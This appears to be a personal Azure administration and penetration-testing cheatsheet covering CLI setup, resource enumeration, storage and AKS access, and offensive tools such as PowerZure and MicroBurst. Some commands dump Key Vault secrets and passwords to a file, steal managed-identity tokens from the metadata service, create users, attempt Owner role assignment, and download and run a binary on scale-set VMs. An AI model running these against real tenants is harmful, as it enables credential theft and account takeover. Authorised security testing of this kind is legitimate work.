Azure Cheatsheet

Getting Started

Install latest version of Azure CLI on Mac

brew update && brew install azure-cli

Resource: https://docs.microsoft.com/en-us/cli/azure/install-azure-cli-macos

Install latest version of Azure CLI on Linux

# YOLO
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash

Resources:
https://docs.microsoft.com/en-us/cli/azure/install-azure-cli-linux?pivots=apt
https://docs.microsoft.com/en-us/powershell/azure/install-az-ps?view=azps-5.5.0

Install PowerShell

brew install --cask powershell-preview

Run a powershell terminal with:

pwsh-preview

Update Powershell

brew update
brew upgrade powershell-preview --cask

Uninstall Powershell

brew uninstall --cask powershell
sudo rm -rf /usr/local/bin/pwsh-preview /usr/local/microsoft/powershell

Resource: https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-core-on-macos?view=powershell-7.1

Install Azure PowerShell module

For the current user:

if ($PSVersionTable.PSEdition -eq 'Desktop' -and (Get-Module -Name AzureRM -ListAvailable)) {
    Write-Warning -Message ('Az module not installed. Having both the AzureRM and ' +
      'Az modules installed at the same time is not supported.')
} else {
    Install-Module -Name Az -AllowClobber -Scope CurrentUser
}

Resource:
https://docs.microsoft.com/en-us/powershell/azure/install-az-ps?view=azps-5.5.0

Setup the AzureRMAlias module

This will deal with incompatibilities with older scripts that use AzureRM:

Enable-AzureRmAlias

List available modules

Get-Module -ListAvailable

Get authenticated in Powershell

Connect-AzAccount

List commands in a module

Get-Command -Module <module name>

List functions in a module

Get-Command -Module <module name> -Type Function

Resource: https://stackoverflow.com/questions/6354317/how-do-i-retrieve-the-available-commands-from-a-module

Authenticate via the CLI

Run this command to get authenticated:

az login

This will result in a web browser opening, or a URL prompt. Navigating to this url will prompt you for a code, which you've been provided in the command line. Paste it in, click next, and select the proper account.

Resource: https://docs.microsoft.com/en-us/cli/azure/install-azure-cli-macos

Info Gathering

List subscriptions for authenticated account

az account list

Get tenant id

az account list | jq '.[].tenantId'

Get subscription id

az cli:

az account list | jq '.[].id'

Powershell:

Get-AzSubscription

Resources:
https://docs.microsoft.com/en-us/powershell/module/az.accounts/get-azsubscription?view=azps-5.5.0 - powershell docs
https://docs.microsoft.com/en-us/cli/azure/account?view=azure-cli-latest - cli docs

List tenants

az account tenant list

List Resource Groups by name

az group list | jq -r '.[].name'

Resource: https://docs.microsoft.com/en-us/cli/azure/group?view=azure-cli-latest

Set Subscription

az cli:

az account set -s <name or id>

Powershell:

Set-AzureSubscription -Id [Subscription ID]

Resource: https://powerzure.readthedocs.io/en/latest/Requirements/requirements.html
https://stackoverflow.com/questions/38475104/azure-cli-how-to-change-subscription-default - cli

List all VMs

az vm list

Resource: https://docs.microsoft.com/en-us/cli/azure/vm?view=azure-cli-latest

Blob Storage

List all storage accounts and output in a table format:

az storage account list -o table

List all storage accounts and get storage account names:

az storage account list -o json | jq -r '.[].name'

You can assign one of the account names to an env var if you'd like:

export AZURE_STORAGE_ACCOUNT=<storage account name from output>

Get storage keys

If you set the env var:

az storage account keys list -n $AZURE_STORAGE_ACCOUNT

You can assign one of the keys to an env var if you'd like:

export AZURE_STORAGE_KEY='<your key from the output of the previous command>'

List storage containers

az storage container list --account-name $AZURE_STORAGE_ACCOUNT --account-key "$AZURE_STORAGE_KEY"

List storage container contents

az storage blob list --container-name <name of storage container from previous command> --account-name $AZURE_STORAGE_ACCOUNT --account-key $AZURE_STORAGE_KEY

Resource: https://www.secsignal.org/en/news/how-i-hacked-a-domain-controller-in-azure-during-a-penetration-test/

List blob names

az storage blob list --container-name <name of storage container from previous command> --account-name $AZURE_STORAGE_ACCOUNT --account-key $AZURE_STORAGE_KEY | jq '.[].name'

Azure Kubernetes (k8s)

Get available versions of k8s in a region

REGION=westus2 # This will vary depending on the region you're using
az aks get-versions --location $REGION -o table

Resource: https://gist.github.com/yokawasa/fd9d9b28f7c79461f60d86c23f615677#aks-cheat-sheet

List managed k8s clusters

az aks list

Resource: https://docs.microsoft.com/en-us/cli/azure/aks?view=azure-cli-latest

Get Resource Group Name for clusters

AZ_RESOURCE_GROUP_NAME=$(az aks list | jq -r '.[].resourceGroup')

Get Cluster Name

AZ_CLUSTER_NAME=$(az aks list | jq -r '.[].name')

Configure kubectl

This is pretty awesome, good job Microsoft:

az aks get-credentials --resource-group $AZ_RESOURCE_GROUP_NAME --name $AZ_CLUSTER_NAME

Resources: https://www.reddit.com/r/kubernetes/comments/8ohxcz/how_to_connect_kubectl_to_aks/
https://docs.microsoft.com/en-us/azure/aks/tutorial-kubernetes-deploy-cluster

Security Auditing

ScoutSuite

https://github.com/nccgroup/ScoutSuite will generate an HTML report outlining various issues that exist in the configuration for a given account.

Install:

git clone git@github.com:nccgroup/ScoutSuite.git
cd ScoutSuite
pipenv --python 3
pipenv shell
pip install -r requirements.txt

Run:

python scout.py azure --cli

Resources: https://kalilinuxtutorials.com/scout-suite-multi-cloud-security-auditing-tool/

PowerZure

git clone git@github.com:hausec/PowerZure.git
cd PowerZure
pwsh-preview

# Authenticate
Connect-AzAccount

# Import PowerZure
# impo is shorthand for Import-Module
ipmo ./PowerZure.ps1

# If you have multiple subscriptions, set the one you want to target:
Set-AzureSubscription -Id [Subscription ID]

# Enumerate all roles
Get-AzureRole

# Enumerate resources the current user has access to
Get-AzureTargets

# Show info about current user
Show-AzureCurrentUser

Resources:
https://powerzure.readthedocs.io/en/latest/
https://stackoverflow.com/questions/64792108/getting-error-could-not-load-file-or-assembly-system-windows-forms-at-import - fix the weird error that comes up for Importing the AzureADPreview module
https://github.com/Azure/azure-docs-powershell-azuread/issues/189 - fix missing modules like Get-AzureADDirectoryRole

Show all functions

powerzure -h 

Get help for a particular function

For example:

get-help Get-AzureTargets

Get all content from all KeyVaults

Show-AzureKeyVaultContent -All

Resource: https://hausec.com/2020/01/31/attacking-azure-azure-ad-and-introducing-powerzure/ - PowerZure general usage info

Create a new user

New-AzureUser -Username 'test@test.com' -Password reallyAwesomePassword123!

MicroBurst

git clone git@github.com:NetSPI/MicroBurst.git
cd MicroBurst

pwsh-preview

# Authenticate
Connect-AzAccount

# Import MicroBurst
ipmo ./MicroBurst.psm1

# Install module for Out-GridView
Install-Module Microsoft.PowerShell.GraphicalTools

# Show commands
Get-Command -Module MicroBurst

# Dump info from an Azure subscription
**Note:** Be sure to click a row in the pop up before clicking **Export**
Get-AzDomainInfo -folder MicroBurst -Verbose

# Look for creds or certificate stores in a number of places and dump them to `secrets.txt`
**Note:** Be sure to click a row in the pop up before clicking **Export**
Get-AzPasswords -Verbose | Out-File -FilePath ./secrets.txt

# Dump Key Vault Keys and Secrets from an Azure subscription via Automation Accounts specifically
**Note:** Be sure to click a row in the pop up before clicking **Export**
Get-AzKeyVaultsAutomation -Verbose

Resource: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Cloud - Azure Pentest.md - where I found out about the tool initially
https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/out-file?view=powershell-7.1 - write output to a file

SkyArk

git clone https://github.com/cyberark/SkyArk
cd SkyArk
pwsh-preview
Import-Module .\SkyArk.ps1 -force
Start-AzureStealth

Resource: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Cloud - Azure Pentest.md

Azure AD

List all applications

az ad app list --output=table --query='[].{Name:displayName,URL:homepage}'

List all service principles

az ad sp list --output=table --query='[].{Name:displayName,Enabled:accountEnabled,URL:homepage,Publisher:publisherName,MetadataURL:samlMetadataUrl}'

List all groups

az ad group list --output=json --query='[].{Group:displayName,Description:description}'

Resource: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/

VMSS

View all VMSS in a subscription

Simply navigate to this page and use the magical Try it button to use the REST API to grab this info. Neat!

CLI

az vmss list

Get VMSS by name and associated resource group

az vmss list | jq '.[].name, .[].resourceGroup'

List vms in a VMSS

az vmss list-instances -n $VMSS_NAME -g $RESOURCE_GROUP

Resource: https://docs.microsoft.com/en-us/cli/azure/vmss?view=azure-cli-latest
https://github.com/andyt530/az2tf/blob/master/scripts/295_azurerm_virtual_machine_scale_set.sh

Get computer name of vms in a VMSS

az vmss list-instances -n $VMSS_NAME -g $RESOURCE_GROUP | jq '.[].osProfile.computerName'

Run command in VM in a VMSS

This will run commands in the instance with an id of 0. See the above commands for how to get the id that corresponds to the instance you want to work with.

az vmss run-command invoke -g $RESOURCE_GROUP -n $VMSS_NAME --command-id RunShellScript --instance-id 0 --scripts 'echo $1 $1' --parameters hello world

Run whoami:

az vmss run-command invoke -g $RESOURCE_GROUP -n $VMSS_NAME --command-id RunShellScript --instance-id 0 --scripts 'whoami'

Run download and run a binary as a background job:

az vmss run-command invoke -g $RESOURCE_GROUP -n $VMSS_NAME --command-id RunShellScript --instance-id 0 --scripts 'bash -c "cd /tmp && wget https://example.com/binary && chmod +x binary && ./binary &"'

Resources:
https://docs.microsoft.com/en-us/powershell/module/az.compute/add-azvmsshpublickey?view=azps-5.5.0
https://heranonazure.wordpress.com/2017/08/30/solution-change-vm-scale-set-ssh-key/ - run command on a VMSS instance

Metadata Service

Get all instance metadata

curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance?api-version=2020-09-01"

Get access token

curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com" 

Resources:
https://docs.microsoft.com/en-us/azure/virtual-machines/linux/instance-metadata-service?tabs=linux - official docs
https://gist.github.com/nordineb/01d69b63d2daf01e61b116bee607c6b8 - a bunch of endpoints you can get to
https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/ - get access token

Request storage account token

# Get OAuth Token
TOKEN=$(curl -s "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com" -H Metadata:true | jq -r '.access_token')

# Get subscription id
SUB=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance?api-version=2020-09-01" | jq -r '.compute.subscriptionId')

# Get list of storage accounts
curl -s -H "Authorization: Bearer $TOKEN" -H Metadata:true "https://management.azure.com/subscriptions/$SUB/providers/Microsoft.Storage/storageAccounts?api-version=2021-06-01"

Resources: https://gist.github.com/kfosaaen/2620f73690d2948efb2a31897e1f404e - powershell script I used

Get AKS node IP

curl -s -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2017-08-01" | jq -r .network.interface[].ipv4.ipAddress[].privateIpAddress

Resource: https://itnext.io/how-a-naughty-docker-image-on-aks-could-give-an-attacker-access-to-your-azure-subscription-6d05b92bf811

Roles

Create new role assignment

This will try to assign the assignee the owner role:

az role assignment create --assignee <user or service principal> --role "owner"

Resource: https://www.xmcyber.com/privilege-escalation-and-lateral-movement-on-azure-part-1/

Features

Show registered features in a table format:

az feature list -o table

Find features associated w/ ContainerService

az feature list -o table --query "[?contains(name, 'Microsoft.ContainerService')].{Name:name,State:properties.state}"

Resource: https://heranonazure.wordpress.com/2019/09/02/secure-api-server-using-authorized-ip-address-ranges/